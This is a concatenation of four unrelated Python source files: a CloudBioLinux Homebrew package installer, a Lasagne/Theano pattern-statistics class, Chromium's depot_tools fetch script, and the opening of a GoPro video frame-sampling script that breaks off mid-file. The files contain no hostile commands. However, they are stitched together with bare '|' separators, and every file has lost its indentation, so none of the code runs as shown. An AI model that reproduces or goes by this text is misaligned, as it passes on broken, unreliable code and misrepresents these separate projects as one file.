from fabric.api import cd, settings
BOTTLE_URL = "https://s3.amazonaws.com/cloudbiolinux/brew_bottles/{pkg}-{version}.x86_64-linux.bottle.tar.gz"
BOTTLE_SUPPORTED = set(["isaac-aligner", "isaac-variant-caller", "cmake"])
def install_packages(env, to_install=None, packages=None):
"""Install packages using the home brew package manager.
Handles upgrading brew, tapping required repositories and installing or upgrading
packages as appropriate.
`to_install` is a CloudBioLinux compatible set of top level items to add,
alternatively `packages` is a list of raw package names.
"""
config_file = get_config_file(env, "packages-homebrew.yaml")
if to_install:
(packages, _) = _yaml_to_packages(config_file.base, to_install, config_file.dist)
# if we have no packages to install, do not try to install or update brew
if len(packages) == 0:
_remove_old(env, config_file.base)
return
system.install_homebrew(env)
brew_cmd = _brew_cmd(env)
formula_repos = ["homebrew/science", "chapmanb/cbl", "homebrew/dupes"]
current_taps = set([x.strip() for x in env.safe_run_output("%s tap" % brew_cmd).split()])
_safe_update(env, brew_cmd, formula_repos, current_taps)
current_taps = set([x.strip() for x in env.safe_run_output("%s tap" % brew_cmd).split()])
for repo in formula_repos:
if repo not in current_taps:
env.safe_run("%s tap %s" % (brew_cmd, repo))
env.safe_run("%s tap --repair" % brew_cmd)
ipkgs = {"outdated": set([x.strip() for x in env.safe_run_output("%s outdated" % brew_cmd).split()]),
"current": _get_current_pkgs(env, brew_cmd)}
_install_brew_baseline(env, brew_cmd, ipkgs, packages)
ipkgs = {"outdated": set([x.strip() for x in env.safe_run_output("%s outdated" % brew_cmd).split()]),
"current": _get_current_pkgs(env, brew_cmd)}
for pkg_str in packages:
_install_pkg(env, pkg_str, brew_cmd, ipkgs)
for pkg_str in ["pkg-config", "openssl", "cmake", "unzip"]:
_safe_unlink_pkg(env, pkg_str, brew_cmd)
with open(config_file.base) as in_handle:
to_remove = yaml.safe_load(in_handle).get("to_remove", [])
for pkg_str in ["curl"] + to_remove:
_safe_uninstall_pkg(env, pkg_str, brew_cmd)
def _remove_old(env, config_file):
"""Temporary approach to remove an old brew install migrated to conda packages.
"""
brew_cmd = os.path.join(env.system_install, "bin", "brew")
if env.safe_exists(brew_cmd):
baseline = ["pkg-config", "openssl", "cmake", "unzip", "curl"]
with open(config_file) as in_handle:
to_remove = yaml.safe_load(in_handle).get("to_remove", [])
for pkg_str in baseline + to_remove:
_safe_uninstall_pkg(env, pkg_str, brew_cmd)
def _safe_update(env, brew_cmd, formula_repos, cur_taps):
"""Revert any taps if we fail to update due to local changes.
"""
with _git_stash(env, brew_cmd):
with quiet():
with settings(warn_only=True):
out = env.safe_run("%s update" % brew_cmd)
if out.failed:
for repo in formula_repos:
if repo in cur_taps:
env.safe_run("%s untap %s" % (brew_cmd, repo))
with settings(warn_only=True):
out = env.safe_run("%s update" % brew_cmd)
if out.failed:
print("\n\nHomebrew update failed.")
print("You might need to upgrade git by installing inside bcbio with:")
print("'brew install git --env=inherit --ignore-dependences'\n\n")
@contextlib.contextmanager
def _git_stash(env, brew_cmd):
"""Perform a safe git stash around an update.
This circumvents brews internal stash approach which doesn't work on older versions
of git and is sensitive to missing config.emails.
"""
brew_prefix = env.safe_run_output("{brew_cmd} --prefix".format(**locals()))
with cd(brew_prefix):
with quiet():
with settings(warn_only=True):
env.safe_run("git config user.email '[email protected]'")
check_diff = env.safe_run("git diff --quiet")
git_version = env.safe_run_output("git --version").strip().split()[-1]
if git_version and LooseVersion(git_version) < LooseVersion("1.7"):
if check_diff.return_code > 0:
with cd(brew_prefix):
with settings(warn_only=True):
env.safe_run("git stash --quiet")
try:
yield None
finally:
if check_diff.return_code > 0:
with cd(brew_prefix):
with settings(warn_only=True):
env.safe_run("git stash pop --quiet")
else:
yield None
def _get_current_pkgs(env, brew_cmd):
out = {}
with quiet():
which_out = env.safe_run_output("{brew_cmd} list --versions".format(**locals()))
for line in which_out.split("\n"):
if line:
parts = line.rstrip().split()
if len(parts) == 2:
pkg, version = line.rstrip().split()
if pkg.endswith(":"):
pkg = pkg[:-1]
out[pkg] = version
return out
def _safe_unlink_pkg(env, pkg_str, brew_cmd):
"""Unlink packages which can cause issues with a Linux system.
"""
with settings(warn_only=True):
with quiet():
env.safe_run("{brew_cmd} unlink {pkg_str}".format(**locals()))
def _safe_link_pkg(env, pkg_str, brew_cmd):
"""Link packages required for builds, but not necessarily installed
"""
with settings(warn_only=True):
with quiet():
env.safe_run("{brew_cmd} link --overwrite {pkg_str}".format(**locals()))
def _safe_uninstall_pkg(env, pkg_str, brew_cmd):
"""Uninstall packages which get pulled in even when unlinked by brew.
"""
with settings(warn_only=True):
with quiet():
env.safe_run("{brew_cmd} uninstall {pkg_str}".format(**locals()))
def _install_pkg(env, pkg_str, brew_cmd, ipkgs):
"""Install a specific brew package, handling versioning and existing packages.
"""
pkg, version, args = _get_pkg_version_args(pkg_str)
installed = False
if version:
_install_pkg_version(env, pkg, args, version, brew_cmd, ipkgs)
installed = True
if pkg in BOTTLE_SUPPORTED and not env.distribution == "macosx":
installed = _install_bottle(env, brew_cmd, pkg, ipkgs)
if not installed:
_install_pkg_latest(env, pkg, args, brew_cmd, ipkgs)
def _install_pkg_version(env, pkg, args, version, brew_cmd, ipkgs):
"""Install a specific version of a package by retrieving from git history.
https://gist.github.com/gcatlin/1847248
Handles both global packages and those installed via specific taps.
"""
if ipkgs["current"].get(pkg.split("/")[-1]) == version:
return
if version == "HEAD":
args = " ".join(args)
brew_install = _get_brew_install_cmd(brew_cmd, env, pkg)
env.safe_run("{brew_install} {args} --HEAD {pkg}".format(**locals()))
else:
raise ValueError("Cannot currently handle installing brew packages by version.")
with _git_pkg_version(env, brew_cmd, pkg, version):
if pkg.split("/")[-1] in ipkgs["current"]:
with settings(warn_only=True):
env.safe_run("{brew_cmd} unlink {pkg}".format(
brew_cmd=brew_cmd, pkg=pkg.split("/")[-1]))
# if we have a more recent version, uninstall that first
cur_version_parts = env.safe_run_output("{brew_cmd} list --versions {pkg}".format(
brew_cmd=brew_cmd, pkg=pkg.split("/")[-1])).strip().split()
if len(cur_version_parts) > 1 and LooseVersion(cur_version_parts[1]) > LooseVersion(version):
with settings(warn_only=True):
env.safe_run("{brew_cmd} uninstall {pkg}".format(**locals()))
env.safe_run("{brew_cmd} install {pkg}".format(**locals()))
with settings(warn_only=True):
env.safe_run("{brew_cmd} switch {pkg} {version}".format(**locals()))
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
@contextlib.contextmanager
def _git_pkg_version(env, brew_cmd, pkg, version):
"""Convert homebrew Git to previous revision to install a specific package version.
"""
git_cmd = _git_cmd_for_pkg_version(env, brew_cmd, pkg, version)
git_fname = git_cmd.split()[-1]
brew_prefix = env.safe_run_output("{brew_cmd} --prefix".format(**locals()))
if git_fname.startswith("{brew_prefix}/Library/Taps/".format(**locals())):
brew_prefix = os.path.dirname(git_fname)
try:
with cd(brew_prefix):
if version != "HEAD":
env.safe_run(git_cmd)
yield
finally:
# reset Git back to latest
with cd(brew_prefix):
if version != "HEAD":
cmd_parts = git_cmd.split()
env.safe_run("%s reset HEAD %s" % (cmd_parts[0], cmd_parts[-1]))
cmd_parts[2] = "--"
env.safe_run(" ".join(cmd_parts))
def _git_cmd_for_pkg_version(env, brew_cmd, pkg, version):
"""Retrieve git command to check out a specific version from homebrew.
"""
git_cmd = None
for git_line in env.safe_run_output("{brew_cmd} versions {pkg}".format(**locals())).split("\n"):
if git_line.startswith(version):
git_cmd = " ".join(git_line.rstrip().split()[1:])
break
if git_cmd is None:
raise ValueError("Did not find version %s for %s" % (version, pkg))
return git_cmd
def _latest_pkg_version(env, brew_cmd, pkg, devel=False):
"""Retrieve the latest available version of a package and if it is linked.
"""
i = 0
version, is_linked = None, False
with settings(warn_only=True):
info_str = env.safe_run_output("{brew_cmd} info {pkg}".format(**locals()))
for i, git_line in enumerate(info_str.split("\n")):
if git_line.strip():
if i == 0:
_, version_str = git_line.split(":")
versions = version_str.split(",")
if devel:
dev_strs = [x for x in versions if x.strip().startswith("devel")]
version = dev_strs[0].split()[-1].strip()
else:
version = versions[0].replace("(bottled)", "").split()[-1].strip()
elif git_line.find("Cellar/%s" % pkg) > 0 and git_line.find(" files,") > 0:
is_linked = git_line.strip().split()[-1] == "*"
return version, is_linked
def _get_brew_install_cmd(brew_cmd, env, pkg):
perl_setup = "export PERL5LIB=%s/lib/perl5:${PERL5LIB}" % env.system_install
compiler_setup = "export CC=${CC:-`which gcc`} && export CXX=${CXX:-`which g++`}"
shell_setup = "export SHELL=${SHELL:-/bin/bash}"
extra_args = ""
if pkg in ["cmake"]:
extra_args += " --without-docs"
if pkg in ["lumpy-sv", "bamtools", "freebayes", "git"]:
extra_args += " --ignore-dependencies"
return "%s && %s && %s && %s install --env=inherit %s" % (compiler_setup, shell_setup, perl_setup,
brew_cmd, extra_args)
def _install_pkg_latest(env, pkg, args, brew_cmd, ipkgs):
"""Install the latest version of the given package.
"""
short_pkg = pkg.split("/")[-1]
do_install = True
is_linked = True
remove_old = False
if pkg in ipkgs["outdated"] or short_pkg in ipkgs["outdated"]:
remove_old = True
elif pkg in ipkgs["current"] or short_pkg in ipkgs["current"]:
do_install = False
pkg_version, is_linked = _latest_pkg_version(env, brew_cmd, pkg, devel="--devel" in args)
cur_version = ipkgs["current"].get(pkg, ipkgs["current"][short_pkg])
if cur_version != pkg_version and cur_version.split("_")[0] != pkg_version:
remove_old = True
do_install = True
if do_install:
if remove_old:
env.safe_run("{brew_cmd} remove --force {short_pkg}".format(**locals()))
flags = " ".join(args)
with settings(warn_only=True):
cmd = "%s %s %s" % (_get_brew_install_cmd(brew_cmd, env, pkg), flags, pkg)
with _custom_unlink(env, brew_cmd, pkg):
result = env.safe_run_output(cmd)
if result.failed and not result.find("Could not symlink") > 0:
sys.tracebacklimit = 1
raise ValueError("Failed to install brew formula: %s\n" % pkg +
"To debug, please try re-running the install command with verbose output:\n" +
cmd.replace("brew install", "brew install -v"))
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
# installed but not linked
elif not is_linked:
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
@contextlib.contextmanager
def _custom_unlink(env, brew_cmd, pkg):
"""Handle custom unlinking of packages that can break builds of others.
Does a temporary unlink and relink of packages while building.
"""
unlinks = {"lumpy-sv": ["bamtools"]}
for upkg in unlinks.get(pkg, []):
_safe_unlink_pkg(env, upkg, brew_cmd)
try:
yield None
finally:
for upkg in unlinks.get(pkg, []):
with settings(warn_only=True):
with quiet():
env.safe_run("%s link --overwrite %s" % (brew_cmd, upkg))
def _get_pkg_version_args(pkg_str):
"""Uses Python style package==0.1 version specifications and args separated with ';'
"""
arg_parts = pkg_str.split(";")
if len(arg_parts) == 1:
args = []
else:
pkg_str = arg_parts[0]
args = arg_parts[1:]
parts = pkg_str.split("==")
if len(parts) == 1:
return parts[0], None, args
else:
assert len(parts) == 2
name, version = parts
return name, version, args
def _install_bottle(env, brew_cmd, pkg, ipkgs):
"""Install Linux bottles for brew packages that can be tricky to build.
"""
if env.distribution == "macosx": # Only Linux bottles, build away on Mac
return False
pkg_version, is_linked = _latest_pkg_version(env, brew_cmd, pkg)
install_version = ipkgs["current"].get(pkg)
if pkg_version == install_version: # Up to date
if not is_linked:
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
return True
elif install_version or pkg in ipkgs["outdated"]:
env.safe_run("{brew_cmd} remove --force {pkg}".format(**locals()))
url = BOTTLE_URL.format(pkg=pkg, version=pkg_version)
brew_cachedir = env.safe_run_output("%s --cache" % brew_cmd)
brew_cellar = os.path.join(env.safe_run_output("%s --prefix" % brew_cmd), "Cellar")
with quiet():
env.safe_run("mkdir -p %s" % brew_cellar)
out_file = os.path.join(brew_cachedir, os.path.basename(url))
if env.safe_exists(out_file):
env.safe_run("rm -f %s" % out_file)
bottle_file = shared._remote_fetch(env, url, out_file=out_file,
allow_fail=True, samedir=True)
if bottle_file:
with cd(brew_cellar):
env.safe_run("tar -xf %s" % bottle_file)
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
return True
else:
return False
def _install_brew_baseline(env, brew_cmd, ipkgs, packages):
"""Install baseline brew components not handled by dependency system.
- Installation of required Perl libraries.
- Upgrades any package dependencies
"""
for dep in ["openssl"]:
_safe_link_pkg(env, dep, brew_cmd)
for dep in ["expat", "pkg-config", "xz", "unzip"]:
_install_pkg(env, dep, brew_cmd, ipkgs)
# check if we have an older git and need to install it from brew
git_version = None
with quiet():
with settings(warn_only=True):
git_version = env.safe_run_output("git --version").strip().split()[-1]
if git_version and LooseVersion(git_version) < LooseVersion("1.7"):
_install_pkg(env, "git", brew_cmd, ipkgs)
for dep in ["sambamba"]: # Avoid conflict with homebrew-science sambamba
env.safe_run("{brew_cmd} remove --force {dep}".format(**locals()))
for dependency in ["htslib"]:
if dependency in packages:
if (dependency in ipkgs["outdated"] or "chapmanb/cbl/%s" % dependency in ipkgs["outdated"]
or dependency not in ipkgs["current"]):
_install_pkg_latest(env, dependency, [], brew_cmd, ipkgs)
if "cpanminus" in packages:
_install_pkg_latest(env, "cpanminus", [], brew_cmd, ipkgs)
_install_pkg_latest(env, "samtools-library-0.1", [], brew_cmd, ipkgs)
cpan.install_packages(env)
# Ensure paths we may have missed on install are accessible to regular user
if env.use_sudo:
paths = ["share", "share/java"]
for path in paths:
with quiet():
test_access = env.safe_run("test -d %s/%s && test -O %s/%s" % (env.system_install, path,
env.system_install, path))
if test_access.failed and env.safe_exists("%s/%s" % (env.system_install, path)):
env.safe_sudo("chown %s %s/%s" % (env.user, env.system_install, path))
def _brew_cmd(env):
"""Retrieve brew command for installing homebrew packages.
"""
cmd = find_cmd(env, "brew", "--version")
if cmd is None:
raise ValueError("Did not find working installation of Linuxbrew/Homebrew. "
"Please check if you have ruby available.")
else:
return cmd
|
|
# Begin: Python 2/3 compatibility header small
# Get Python 3 functionality:
from __future__ import\
absolute_import, print_function, division, unicode_literals
from future.utils import raise_with_traceback, raise_from
# catch exception with: except Exception as e
from builtins import range, map, zip, filter
from io import open
import six
# End: Python 2/3 compatability header small
import lasagne.layers as L
import numpy as np
import theano
import theano.tensor as T
from .base import BasePatternComputer
__all__ = [
"CombinedPatternComputer"
]
# How everything fits together :
# Pattern types and the filter function.
subtypes = [
('basic', lambda x: 1.0+0.0*x),
('positive_y', lambda x: 1.0*T.gt(x,0.0)),
('negative_y', lambda x: 1.0-1.0*T.gt(x,0.0))
]
# Statistics need for each pattern type.
subtype_keys = [
'cnt', # Number of sample per variable.
'm_x', # Mean along x.
'm_y', # Mean along y.
'xty', # Covariance x and y.
'yty', # Covaraince y and y.
]
# This has a specific aggregation function.
subtype_keys_no_aggregation = ['cnt']
# Create new stats dict.
def create_dict(new_stats):
ret = []
n_per_dict = len(subtypes)*len(subtype_keys)
for i in range(0, len(new_stats), n_per_dict):
ret.append(list_to_dict(new_stats[i : i+n_per_dict]))
return ret
# Stats list to dict.
def list_to_dict(stats_list):
stats_dict = dict()
idx = 0
for key, _ in subtypes:
stats_dict[key]=dict()
for sub_key in subtype_keys:
stats_dict[key][sub_key] = stats_list[idx]
idx+=1
return stats_dict
# Stats dict to list
def dict_to_list(stats_dict):
stats_list = []
for key,_ in subtypes:
for sub_key in subtype_keys:
stats_list.append(stats_dict[key][sub_key])
return stats_list
class CombinedPatternComputer(BasePatternComputer):
def get_split(self, layer,
deterministic=True, conv_all_patches=True, **kwargs):
# Get the patches and the outputs without the non-linearities.
if type(layer) is L.DenseLayer:
x, y = get_dense_xy(layer, deterministic)
elif type(layer) is L.Conv2DLayer:
if conv_all_patches is True:
x, y = get_conv_xy_all(layer, deterministic)
else:
x, y = get_conv_xy(layer, deterministic)
else:
raise ValueError("Unknown layer as input")
# Create an output dictionary
outputs = dict()
for name, fun in subtypes:
outputs[name] = dict()
mrk_y = 1.0* T.cast(fun(y), dtype=theano.config.floatX) # (N,O)
y_current = y*mrk_y # This has a binary mask
cnt_y = T.shape_padaxis(T.sum(mrk_y, axis=0), axis=0) # (1,O)
norm = T.maximum(cnt_y, 1.)
# Count how many datapoints are considered
outputs[name]['cnt'] = cnt_y
# The mean of the current batch
outputs[name]['m_y'] = T.shape_padaxis(y_current.sum(axis=0), axis=0) / norm # (1,O) mean output for batch
outputs[name]['m_x'] = T.dot(x.T, mrk_y) / norm # (D,O) mean input for batch
# The mean of the current batch
outputs[name]['yty'] = T.shape_padaxis(T.sum(y_current ** 2., axis=0), axis=0) / norm # (1,O)
outputs[name]['xty'] = T.dot(x.T, y_current) / norm # D,O
return dict_to_list(outputs)
def _update_statistics(self, new_stats, stats):
new_stats = create_dict(new_stats)
if stats is None:
stats = new_stats
return stats
# update the stats layerwise
for l_i in range(len(stats)):
for subtype,_ in subtypes:
# TODO: Have to check the type to see if this is needed
cnt_old = 1.0 * stats[l_i][subtype]['cnt']
stats[l_i][subtype]['cnt'] = (stats[l_i][subtype]['cnt']
+ new_stats[l_i][subtype]['cnt'])
norm = np.maximum(stats[l_i][subtype]['cnt'], 1.0)
for key in subtype_keys:
if key not in subtype_keys_no_aggregation:
tmp_old = cnt_old / norm * stats[l_i][subtype][key]
tmp_new = (new_stats[l_i][subtype]['cnt']
/ norm * new_stats[l_i][subtype][key])
stats[l_i][subtype][key] = tmp_old + tmp_new
return stats
def _compute_Exy_ExEy(self,stats,key,l_i):
return (stats[l_i][key]['xty']
- stats[l_i][key]['m_x'] * stats[l_i]['basic']['m_y']) # D,O
def _get_W(self, id):
dl = self.layers[id]
W = dl.W.get_value()
if W.ndim == 4:
if dl.flip_filters:
W = W[:, :, ::-1, ::-1]
W = get_2D(W)
return W
def _update_length(self, A, id):
W = self.get_W(id)
norm = np.diag(np.dot(get_2D(W).T,A))[np.newaxis]
norm = norm + 1.0*(norm == 0.0)
return A / norm
def _compute_A(self, stats, key, l_i):
W = self._get_W(l_i) #D,O
numerator = self._compute_Exy_ExEy(stats, key, l_i) #D,O
denumerator = np.dot(W.T,numerator) #O,O
denumerator = np.diag(denumerator) #1,O
if np.sum(denumerator == 0) > 0:
denumerator= denumerator + 1.0*(denumerator==0)
A = numerator / denumerator[np.newaxis]
A = self._update_length(A, l_i)
return A
def _compute_patterns(self, stats):
patterns = dict()
for key,_ in subtypes:
patterns[key]=dict()
patterns[key]['A'] = []
patterns[key]['r'] = []
patterns[key]['mu'] = []
for l_i in range(len(stats)):
# using uppercase now
A = self._compute_A(stats, key, l_i)
r = stats[l_i][key]['m_x'] - A * stats[l_i][key]['m_y'] # D,O
mu = stats[l_i][key]['m_x']
if self.layers[l_i].W.get_value().ndim == 4:
A = A.T.reshape(self.layers[l_i].W.get_value().shape)
r = r.T.reshape(A.shape)
mu = mu.T.reshape(A.shape)
assert(np.sum(np.isnan(A)) == 0.,
"Something went wrong, nan in A")
patterns[key]['A'].append(A.astype(np.float32))
patterns[key]['r'].append(r.astype(np.float32))
patterns[key]['mu'].append(mu.astype(np.float32))
return patterns
def process_batches(self, X_train, batch_size, n_batches=None, **kwargs):
is_generator = type(X_train) not in [np.ndarray, np.core.memmap]
if is_generator is True:
if n_batches is None:
raise ValueError("X_train is generator, in this case "
"n_batches needs to be specified.")
else:
n_datapoints = X_train.shape[0]
n_batches = n_datapoints // batch_size
stats = None
for i in range(n_batches):
# Load batch
if is_generator:
X = X_train()
else:
X = X_train[i*batch_size : (i+1)*batch_size]
# Get components from the GPU
new_stats = self.f(X)
# Update stats.
stats= self._update_statistics(new_stats, stats)
# Compute the actual patterns
return self._compute_patterns(stats)
|
|
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tool to perform checkouts in one easy command line!
Usage:
fetch <recipe> [--property=value [--property2=value2 ...]]
This script is a wrapper around various version control and repository
checkout commands. It requires a |recipe| name, fetches data from that
recipe in depot_tools/recipes, and then performs all necessary inits,
checkouts, pulls, fetches, etc.
Optional arguments may be passed on the command line in key-value pairs.
These parameters will be passed through to the recipe's main method.
"""
import json
import optparse
import os
import pipes
import subprocess
import sys
import textwrap
from distutils import spawn
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))
#################################################
# Checkout class definitions.
#################################################
class Checkout(object):
"""Base class for implementing different types of checkouts.
Attributes:
|base|: the absolute path of the directory in which this script is run.
|spec|: the spec for this checkout as returned by the recipe. Different
subclasses will expect different keys in this dictionary.
|root|: the directory into which the checkout will be performed, as returned
by the recipe. This is a relative path from |base|.
"""
def __init__(self, options, spec, root):
self.base = os.getcwd()
self.options = options
self.spec = spec
self.root = root
def exists(self):
pass
def init(self):
pass
def sync(self):
pass
def run(self, cmd, **kwargs):
print 'Running: %s' % (' '.join(pipes.quote(x) for x in cmd))
if self.options.dry_run:
return ''
return subprocess.check_output(cmd, **kwargs)
class GclientCheckout(Checkout):
def run_gclient(self, *cmd, **kwargs):
if not spawn.find_executable('gclient'):
cmd_prefix = (sys.executable, os.path.join(SCRIPT_PATH, 'gclient.py'))
else:
cmd_prefix = ('gclient',)
return self.run(cmd_prefix + cmd, **kwargs)
def exists(self):
try:
gclient_root = self.run_gclient('root').strip()
return (os.path.exists(os.path.join(gclient_root, '.gclient')) or
os.path.exists(os.path.join(os.getcwd(), self.root)))
except subprocess.CalledProcessError:
pass
return os.path.exists(os.path.join(os.getcwd(), self.root))
class GitCheckout(Checkout):
def run_git(self, *cmd, **kwargs):
if sys.platform == 'win32' and not spawn.find_executable('git'):
git_path = os.path.join(SCRIPT_PATH, 'git.bat')
else:
git_path = 'git'
return self.run((git_path,) + cmd, **kwargs)
class SvnCheckout(Checkout):
def run_svn(self, *cmd, **kwargs):
if sys.platform == 'win32' and not spawn.find_executable('svn'):
svn_path = os.path.join(SCRIPT_PATH, 'svn_bin', 'svn.exe')
else:
svn_path = 'svn'
return self.run((svn_path,) + cmd, **kwargs)
class GclientGitCheckout(GclientCheckout, GitCheckout):
def __init__(self, options, spec, root):
super(GclientGitCheckout, self).__init__(options, spec, root)
assert 'solutions' in self.spec
def _format_spec(self):
def _format_literal(lit):
if isinstance(lit, basestring):
return '"%s"' % lit
if isinstance(lit, list):
return '[%s]' % ', '.join(_format_literal(i) for i in lit)
return '%r' % lit
soln_strings = []
for soln in self.spec['solutions']:
soln_string= '\n'.join(' "%s": %s,' % (key, _format_literal(value))
for key, value in soln.iteritems())
soln_strings.append(' {\n%s\n },' % soln_string)
gclient_spec = 'solutions = [\n%s\n]\n' % '\n'.join(soln_strings)
extra_keys = ['target_os', 'target_os_only']
gclient_spec += ''.join('%s = %s\n' % (key, _format_literal(self.spec[key]))
for key in extra_keys if key in self.spec)
return gclient_spec
def init(self):
# Configure and do the gclient checkout.
self.run_gclient('config', '--spec', self._format_spec())
sync_cmd = ['sync']
if self.options.nohooks:
sync_cmd.append('--nohooks')
if self.options.no_history:
sync_cmd.append('--no-history')
if self.spec.get('with_branch_heads', False):
sync_cmd.append('--with_branch_heads')
self.run_gclient(*sync_cmd)
# Configure git.
wd = os.path.join(self.base, self.root)
if self.options.dry_run:
print 'cd %s' % wd
self.run_git(
'submodule', 'foreach',
'git config -f $toplevel/.git/config submodule.$name.ignore all',
cwd=wd)
self.run_git(
'config', '--add', 'remote.origin.fetch',
'+refs/tags/*:refs/tags/*', cwd=wd)
self.run_git('config', 'diff.ignoreSubmodules', 'all', cwd=wd)
class GclientGitSvnCheckout(GclientGitCheckout, SvnCheckout):
def __init__(self, options, spec, root):
super(GclientGitSvnCheckout, self).__init__(options, spec, root)
def init(self):
# Ensure we are authenticated with subversion for all submodules.
git_svn_dirs = json.loads(self.spec.get('submodule_git_svn_spec', '{}'))
git_svn_dirs.update({self.root: self.spec})
for _, svn_spec in git_svn_dirs.iteritems():
if svn_spec.get('svn_url'):
try:
self.run_svn('ls', '--non-interactive', svn_spec['svn_url'])
except subprocess.CalledProcessError:
print 'Please run `svn ls %s`' % svn_spec['svn_url']
return 1
super(GclientGitSvnCheckout, self).init()
# Configure git-svn.
for path, svn_spec in git_svn_dirs.iteritems():
real_path = os.path.join(*path.split('/'))
if real_path != self.root:
real_path = os.path.join(self.root, real_path)
wd = os.path.join(self.base, real_path)
if self.options.dry_run:
print 'cd %s' % wd
if svn_spec.get('auto'):
self.run_git('auto-svn', cwd=wd)
continue
self.run_git('svn', 'init', svn_spec['svn_url'], cwd=wd)
self.run_git('config', '--unset-all', 'svn-remote.svn.fetch', cwd=wd)
for svn_branch, git_ref in svn_spec.get('git_svn_fetch', {}).items():
self.run_git('config', '--add', 'svn-remote.svn.fetch',
'%s:%s' % (svn_branch, git_ref), cwd=wd)
for svn_branch, git_ref in svn_spec.get('git_svn_branches', {}).items():
self.run_git('config', '--add', 'svn-remote.svn.branches',
'%s:%s' % (svn_branch, git_ref), cwd=wd)
self.run_git('svn', 'fetch', cwd=wd)
CHECKOUT_TYPE_MAP = {
'gclient': GclientCheckout,
'gclient_git': GclientGitCheckout,
'gclient_git_svn': GclientGitSvnCheckout,
'git': GitCheckout,
}
def CheckoutFactory(type_name, options, spec, root):
"""Factory to build Checkout class instances."""
class_ = CHECKOUT_TYPE_MAP.get(type_name)
if not class_:
raise KeyError('unrecognized checkout type: %s' % type_name)
return class_(options, spec, root)
#################################################
# Utility function and file entry point.
#################################################
def usage(msg=None):
"""Print help and exit."""
if msg:
print 'Error:', msg
print textwrap.dedent("""\
usage: %s [options] <recipe> [--property=value [--property2=value2 ...]]
This script can be used to download the Chromium sources. See
http://www.chromium.org/developers/how-tos/get-the-code
for full usage instructions.
Valid options:
-h, --help, help Print this message.
--nohooks Don't run hooks after checkout.
-n, --dry-run Don't run commands, only print them.
--no-history Perform shallow clones, don't fetch the full git history.
Valid fetch recipes:""") % os.path.basename(sys.argv[0])
recipes_dir = os.path.join(SCRIPT_PATH, 'recipes')
recipes = [f[:-3] for f in os.listdir(recipes_dir) if f.endswith('.py')]
recipes.sort()
for fname in recipes:
print ' ' + fname
sys.exit(bool(msg))
def handle_args(argv):
"""Gets the recipe name from the command line arguments."""
if len(argv) <= 1:
usage('Must specify a recipe.')
if argv[1] in ('-h', '--help', 'help'):
usage()
dry_run = False
nohooks = False
no_history = False
while len(argv) >= 2:
arg = argv[1]
if not arg.startswith('-'):
break
argv.pop(1)
if arg in ('-n', '--dry-run'):
dry_run = True
elif arg == '--nohooks':
nohooks = True
elif arg == '--no-history':
no_history = True
else:
usage('Invalid option %s.' % arg)
def looks_like_arg(arg):
return arg.startswith('--') and arg.count('=') == 1
bad_parms = [x for x in argv[2:] if not looks_like_arg(x)]
if bad_parms:
usage('Got bad arguments %s' % bad_parms)
recipe = argv[1]
props = argv[2:]
return (
optparse.Values(
{'dry_run':dry_run, 'nohooks':nohooks, 'no_history': no_history }),
recipe,
props)
def run_recipe_fetch(recipe, props, aliased=False):
"""Invoke a recipe's fetch method with the passed-through args
and return its json output as a python object."""
recipe_path = os.path.abspath(os.path.join(SCRIPT_PATH, 'recipes', recipe))
if not os.path.exists(recipe_path + '.py'):
print "Could not find a recipe for %s" % recipe
sys.exit(1)
cmd = [sys.executable, recipe_path + '.py', 'fetch'] + props
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
spec = json.loads(result)
if 'alias' in spec:
assert not aliased
return run_recipe_fetch(
spec['alias']['recipe'], spec['alias']['props'] + props, aliased=True)
cmd = [sys.executable, recipe_path + '.py', 'root']
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
root = json.loads(result)
return spec, root
def run(options, spec, root):
"""Perform a checkout with the given type and configuration.
Args:
options: Options instance.
spec: Checkout configuration returned by the the recipe's fetch_spec
method (checkout type, repository url, etc.).
root: The directory into which the repo expects to be checkout out.
"""
assert 'type' in spec
checkout_type = spec['type']
checkout_spec = spec['%s_spec' % checkout_type]
try:
checkout = CheckoutFactory(checkout_type, options, checkout_spec, root)
except KeyError:
return 1
if checkout.exists():
print 'Your current directory appears to already contain, or be part of, '
print 'a checkout. "fetch" is used only to get new checkouts. Use '
print '"gclient sync" to update existing checkouts.'
print
print 'Fetch also does not yet deal with partial checkouts, so if fetch'
print 'failed, delete the checkout and start over (crbug.com/230691).'
return 1
return checkout.init()
def main():
options, recipe, props = handle_args(sys.argv)
spec, root = run_recipe_fetch(recipe, props)
return run(options, spec, root)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
|
'''
Generate some random frames from an image, and also plot out the colors
Gareth flips the camera every 5m, and this causes a spike in the RGB signals. We want to use these as pointers and to allow us to
register the videos. We use k-means to identify the middle of each slice, and use the difference of those as the offset in the register.
In this version, I create a directory for each of the movies and save from min to max number of images per shot. The min/max are calculated from aligning the peaks.
'''
# coding: utf-8
import matplotlib
import cv2
matplotlib.use('agg')
from matplotlib import pyplot as plt
from matplotlib.font_manager import FontProperties
import numpy
from scipy.cluster import vq
import sys
import argparse
import random
import os
parser = argparse.ArgumentParser(description="Plot the color profiles of movies from Gareth's goPros")
parser.add_argument('-f', '--file', help='Movie file(s). You can provide more than one video and the first will be used to create the list of random images. Color plots will be made for all images.', required=True, nargs='+')
# parser.add_argument('-o', '--out', help='output file name to draw the graph to', required=True)
parser.add_argument('-n', '--number', help='Number of images to print', required=True)
parser.add_argument('-m', '--frames', help='Stop after this number of frames (default == all)', type=int)
parser.add_argument('-d', '--median', help='Calculate and plot the median color intenity instead of the mean color intensity. Note that the median is more noisy and longer to compute than the mean', action='store_true')
parser.add_argument('-w', '--window', help='Window size to average the numbers over (try 1/100 * # images). If not provided the numbers are not averaged. 100 is a good starting point if you are not sure!')
parser.add_argument('-i', '--ignore', help='Number of frames at the beginning to ignore. If you want to run in a bit and ignore some frames, use this.', type=int, default=0);
args = parser.parse_args()
savedImages = {}
def movingAverage(interval, window_size):
